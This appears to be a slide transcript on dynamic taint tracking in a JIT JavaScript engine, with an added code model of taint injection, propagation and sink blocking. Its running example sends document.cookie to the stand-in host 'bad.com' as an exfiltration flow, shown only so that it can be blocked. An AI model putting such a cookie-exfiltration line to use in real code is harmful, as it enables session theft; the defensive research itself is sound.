document.cookie: identity theft via cookie stealing ✗
TRANSCRIPT
Dynamic Taint Tracking
1. Tag a value with a taint
2. Propagate taints along with the value
3. Block tainted values at untrusted sinks
Example: Cookie Stealing
Inject taints (at confidential sources)
ck = document.cookie;      // source: document.cookie receives its taint here
data = tmp + ck;
send("bad.com", data);
Example: Cookie Stealing
Propagate taints (at assignments, etc.)
ck = document.cookie;      // ck is tainted
data = tmp + ck;           // the taint flows from ck through tmp + ck into data
send("bad.com", data);     // data is tainted
Example: Cookie Stealing
Block taints (at untrusted sinks)
send("bad.com", "cr=" + color);   // untainted argument
send("bad.com", data);            // tainted argument: blocked
Dynamic Taint Tracking: Policies
Cookie Protection:    cookie      → send()      ✗
Password Protection:  password    → send()      ✗
General Policy:       secret info → expression  ✗
Dynamic Taint Tracking: JS
- Cross site scripting prevention with dynamic data tainting and static analysis, NDSS'07
- Analyzing information flow in JavaScript-based browser extensions, ACSAC'09
- An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10
Overhead: 10~100x slowdown
Source code → Interpreter, JIT Engine (based on JaegerMonkey)
Modification: the engine is augmented with taint tracking logic
Language Extensions
var secret = __taint(34349, 1);
tmp = secret * 68;
tmp2 = tmp + "345";
tmp3 = parseInt(tmp2);
alert(__taintof(tmp)); // 1 is printed
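The three steps (inject, propagate, block) and the __taint/__taintof extension, modelled as an added JavaScript example that is not code from the slides or from the JaegerMonkey-based engine: each tainted value is wrapped with a label bitmask that plays the role of its shadow, taints join by bitwise OR as on the shadow stack, and send() is the untrusted sink enforcing the cookie and password policies. Tainted, op, plain, the policy constants and the document stand-in are this example's own assumptions.

```javascript
// Added model of inject / propagate / block in plain JavaScript; not the
// JaegerMonkey engine. Label bitmask = the value's "shadow"; join = OR.
const COOKIE = 1;    // label for document.cookie
const PASSWORD = 2;  // label for password fields
class Tainted {
  constructor(value, taint) { this.value = value; this.taint = taint; }
}
// __taint/__taintof re-implemented from the slide's usage (assumption).
const __taint = (value, label) => new Tainted(value, label);
const __taintof = (x) => (x instanceof Tainted ? x.taint : 0);
const plain = (x) => (x instanceof Tainted ? x.value : x);
// Step 2, propagation: a result carries the join (OR) of its operands'
// taints, so taint survives arithmetic, concatenation and parseInt alike.
function op(f, ...args) {
  const joined = args.reduce((t, a) => t | __taintof(a), 0);
  const result = f(...args.map(plain));
  return joined ? new Tainted(result, joined) : result;
}
const add = (a, b) => op((x, y) => x + y, a, b);
const mul = (a, b) => op((x, y) => x * y, a, b);
const parseIntT = (s) => op((x) => parseInt(x, 10), s);

// Step 1, injection: the confidential source is tainted at creation.
// document is a constructed stand-in for the browser's object.
const document = { cookie: __taint("session=abc123", COOKIE) };

// Step 3, blocking: the untrusted sink refuses labels its policy forbids
// (the slides' "cookie -> send() ✗" and "password -> send() ✗").
const SEND_POLICY = COOKIE | PASSWORD;
function send(host, data) {
  const t = __taintof(data) & SEND_POLICY;
  if (t) return { sent: false, reason: `blocked: taint ${t} to ${host}` };
  return { sent: true, host, payload: plain(data) };
}

// The cookie-stealing flow from the slides, stopped at the sink.
function cookieFlow(tmp = "cr=") {
  const ck = document.cookie;      // ck inherits the COOKIE label
  const data = add(tmp, ck);       // taint flows through tmp + ck
  return send("bad.com", data);    // blocked: data is tainted
}
// The language-extension sample: [__taintof(tmp), __taintof(tmp3), tmp3].
function extensionFlow() {
  const secret = __taint(34349, 1);
  const tmp = mul(secret, 68);
  const tmp2 = add(tmp, "345");
  const tmp3 = parseIntT(tmp2);
  return [__taintof(tmp), __taintof(tmp3), plain(tmp3)];
}
```

An untainted argument such as "cr=" + color still passes send(), which is the distinction the block-at-sink step relies on.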
Implementation: Shadow Stack
s * 6 (with s = 5) compiles to: push s; push 6; mul
Real stack:    5, 6 → 30
Shadow stack:  s's taint, 6's taint → joined taint
Implementation: Shadow Property
a.fld = secret
Real properties of a:    fld, ...
Shadow properties of a:  fld's taint, ...
Hybrid Approach
Interpreter: full-fledged taint tracking
JIT Engine: taint detecting
Code stays in the JIT engine if it doesn't touch a taint.
Taint detected!! → do full-fledged taint tracking
Future Work
Missing flows: implicit flows, timing channels, etc.
Empirical study: to prove the usability of taint tracking
Conclusions
A fast hybrid taint tracking engine: the first JIT-enabled taint tracking engine
Still many missing parts: possible to make it a protection tool? Can we sacrifice some performance?